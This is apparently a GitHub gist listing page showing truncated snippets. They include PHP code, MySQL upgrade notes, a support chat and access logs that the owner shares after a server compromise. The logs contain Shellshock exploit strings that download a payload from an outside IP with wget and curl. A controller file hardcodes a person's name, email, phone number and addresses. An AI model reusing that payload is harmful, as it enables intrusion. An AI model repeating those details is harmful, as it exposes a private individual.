Sandeep Kumar vishwakarma09

@vishwakarma09
vishwakarma09 / hello.php
Last active October 5, 2015 06:35
first gist
#some php code
##with some markdown
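```php
<?php
// Print a greeting, sleep through eleven one-second iterations, then say goodbye.
echo "waoo";
for ($i = 0; $i <= 10; $i++) {
    sleep(1);
}
echo "bye";
```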
vishwakarma09 / hello.md
Last active October 5, 2015 06:40
another post with markdown extension

#some php code ##with some markdown

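```php
<?php
// Print a greeting, sleep through eleven one-second iterations, then say goodbye.
echo "waoo";
for ($i = 0; $i <= 10; $i++) {
    sleep(1);
}

echo "bye";
```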
I am seeing a series of attacks on my server. When I check the access logs, I see this pattern:
66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /%C3%BCcretsiz-3d-sohbet.html HTTP/1.1" 404 515 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.130.5.209 - - [16/Jan/2016:23:03:38 +0000] "GET /xmlrpc.php HTTP/1.1" 404 446 "-" "-"
54.166.165.82 - - [17/Jan/2016:01:07:40 +0000] "HEAD / HTTP/1.1" 200 226 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
202.100.92.36 - - [17/Jan/2016:04:35:21 +0000] "HEAD / HTTP/1.0" 200 245 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET /muieblackcat HTTP/1.1" 404 467 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
Hi David,
My server was compromised a few days back. Would you like to take a look? Here are a few access logs:
120.25.200.39 - - [16/Jan/2016:21:00:18 +0000] "GET /cgi-sys/php5 HTTP/1.1" 404 467 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http
vishwakarma09 / User.php
Created April 13, 2016 09:36
User Controller
<?php
ini_set('display_errors','On');
error_reporting(E_ALL);
class User extends CI_Controller {
public function index()
{
$userDetails = '{"status":"SUCCESS","id":25,"message":null,"responseSize":1,"response":{"id":25,"hash":null,"name":"Arindam Nath","firstName":null,"middleName":null,"lastName":null,"email":"strider2023@gmail.com","phoneNumber":"9874381131","accountType":"USER","gender":"MALE","dob":630143205000,"maritalStatus":"SINGLE","workStatus":"SALARIED","residentialStatus":"RENTAL","deviceData":null,"userImage":"https:\/\/s3-ap-southeast-1.amazonaws.com\/mbv-pokket\/user-images\/user_profile_25_userImage_1459410437667.jpg","referralCode":null,"fatherName":"Aroon Nath","gcmId":null,"roleType":"LEND","rating":null,"defaults":null,"userLocationDatas":[{"id":70,"userId":25,"address":"House No. 34, Chooliemedu","city":"Chennai","state":"Tamil Nadu","country":"India","pincode":600034,"type":"HOME","isVerified":true},{"id":50,"userId":25,"address":"Chatterjee Bagan","city":"Hooghly","state":"West
vishwakarma09 / edit_user.php
Created April 13, 2016 09:36
edit user view
<section id="content">
<div class="container">
<div class="block-header">
<h2>Manage Users</h2>
</div>
<div class="card" id="profile-main">
<div class="pm-overview c-overflow mCustomScrollbar _mCS_3 mCS-autoHide" style="overflow: visible;"><div id="mCSB_3" class="mCustomScrollBox mCS-minimal-dark mCSB_vertical_horizontal mCSB_outside" tabindex="0"><div id="mCSB_3_container" class="mCSB_container mCS_x_hidden mCS_no_scrollbar_x" style="position: relative; top: 0px; left: 0px; width: 100%;" dir="ltr">
<div class="pmo-pic">
<div class="p-relative">
#upgrade mysql 5.6
mysqldump --lock-all-tables -u root -p --all-databases > dump.sql
apt-get purge mysql-server-5.5 mysql-client-5.5
apt-get autoremove
apt-get install mysql-server-5.6 mysql-client-5.6
This was spine-chilling because even after the MySQL upgrade, the version was showing 5.5.
I had to reboot the system and yay! All good.
#upgrade php 5.6
12:35 PM Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly.
12:36 PM Connected to the call center
Manisha Jaiswal Welcome to MTS, How may I help you?
Sandeep Kumar 12:29 PM Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly. 12:29 PM Connected to the call center YOGESH KUMAR MISHRA Welcome to MTS, How may I help you? Sandeep Kumar 12:18 PM Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly. 12:18 PM Connected to the call center JAGRATI PANDEY Welcome to MTS, How may I help you? Sandeep Kumar Hi Sandeep Kumar help me with my bill JAGRATI PANDEY Yes ,please let me know how can I help you? Sandeep Kumar Last month I paid full 803 Sandeep Kumar my plan is 599 JAGRATI PANDEY Definitely , I will assist you in this regard. JAGRATI PANDEY May I please request you to confirm your full name and MTS number? Sandeep Kumar this time
#!/bin/bash
set -eo pipefail
shopt -s nullglob
# if command starts with an option, prepend mysqld
if [ "${1:0:1}" = '-' ]; then
	set -- mysqld "$@"
fi
# skip setup if they want an option that stops mysqld